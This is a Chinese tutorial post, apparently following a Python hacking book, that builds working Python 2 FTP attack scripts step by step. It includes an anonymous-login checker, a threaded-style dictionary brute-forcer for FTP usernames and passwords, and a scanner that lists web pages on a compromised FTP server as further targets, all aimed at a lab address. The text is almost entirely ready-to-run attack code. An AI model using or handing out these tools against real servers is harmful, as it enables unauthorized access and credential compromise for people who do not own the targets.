利用ftplib模块
很简单,先获取ftp,然后匿名访问的话用户名是 anonymous
# -*- coding: UTF-8 -*-
import ftplib
def anonLogin(hostname):
try:
ftp = ftplib.FTP(hostname)
ftp.login('anonymous','Recar@Recar.com')
print '\n[*]'+str(hostname) + 'FTP Anonymous Logon Succeeded.'
ftp.quit()
return True
except Exception,e:
print '\n[-]'+str(hostname)+'FTP Anonymous Logon Failed.'
return False
host = '192.168.150.137'
anonLogin(host)
加上optparse方便些
# -*- coding: UTF-8 -*-
import ftplib
import optparse
def anonLogin(hostname):
try:
ftp = ftplib.FTP(hostname)
ftp.login('anonymous','Recar@Recar.com')
print '\n[*] '+str(hostname) + ': FTP Anonymous Logon Succeeded.'
ftp.quit()
return True
except Exception,e:
print '\n[-] '+str(hostname)+': FTP Anonymous Logon Failed.'
return False
def main():
parse = optparse.OptionParser("usage %prog -H <target host>")
parse.add_option('-H',dest='tgtHost',type='string',help='specify target host')
(options,args) = parse.parse_args()
if (options.tgtHost==None):
print parse.usage
else:
host=options.tgtHost
anonLogin(host)
if __name__=='__main__':
main()
那么可以写一个用户名密码爆破的工具,字典里面包含anonymous,那么就可以同时检测是否可以匿名登陆
# -*- coding: UTF-8 -*-
import ftplib
import optparse
from threading import Thread
def bruteLogin(hostname,passwordFile):
with open(passwordFile,'r') as f:
for line in f.readlines():
username = line.split(':') [0]
password = line.split(':') [1].strip('\r').strip('\n')
print "[+] Trying: "+username+":"+password
try:
ftp = ftplib.FTP(hostname)
ftp.login(username,password)
print '\n[+] '+str(hostname)+': FTP Logon Succeeded: '+username+":"+password
ftp.quit()
return (username,password)
except Exception,e:
pass
print '\n[-] Could not brute force FTP credentials.'
return (None,None)
def main():
parse = optparse.OptionParser("usage %prog -H <target host> -P <target password>")
parse.add_option('-H',dest='tgtHost',type='string',help='specify target host')
parse.add_option('-P',dest='tgtPassword',type='string',help='specify target password')
(options,args) = parse.parse_args()
if (options.tgtHost==None)|(options.tgtPassword==None):
print parse.usage
else:
host=options.tgtHost
passwordfile=options.tgtPassword
bruteLogin(host,passwordfile)
if __name__=='__main__':
main()
扫描 FTP服务器上是否有web服务的网页,扫描ftp文件中是否有默认的php,asp,html默认的网页。
# -*- coding: UTF-8 -*-
#这个版本设置的是利用的匿名登陆。当然用之前的爆破脚本爆破出用户名和密码在利用这个
import ftplib
def returnDefault(ftp):
try:
dirlist=ftp.nlst()
except:
dirlist= []
print '[-] Could not list directory contents.'
print '[-] Skipping To Next Target.'
return
retList = []
for filename in dirlist:
fn = filename.lower()
if '.php' in fn or '.htm' in fn or '.asp' in fn:
print '[+] Found default page: '+filename
retList.append(filename)
else:
print '[-] Sorry it`s not have web defaulte page'
return retList
host ='192.168.150.137'
ftp = ftplib.FTP(host)
ftp.login('anonymous','')
returnDefault(ftp)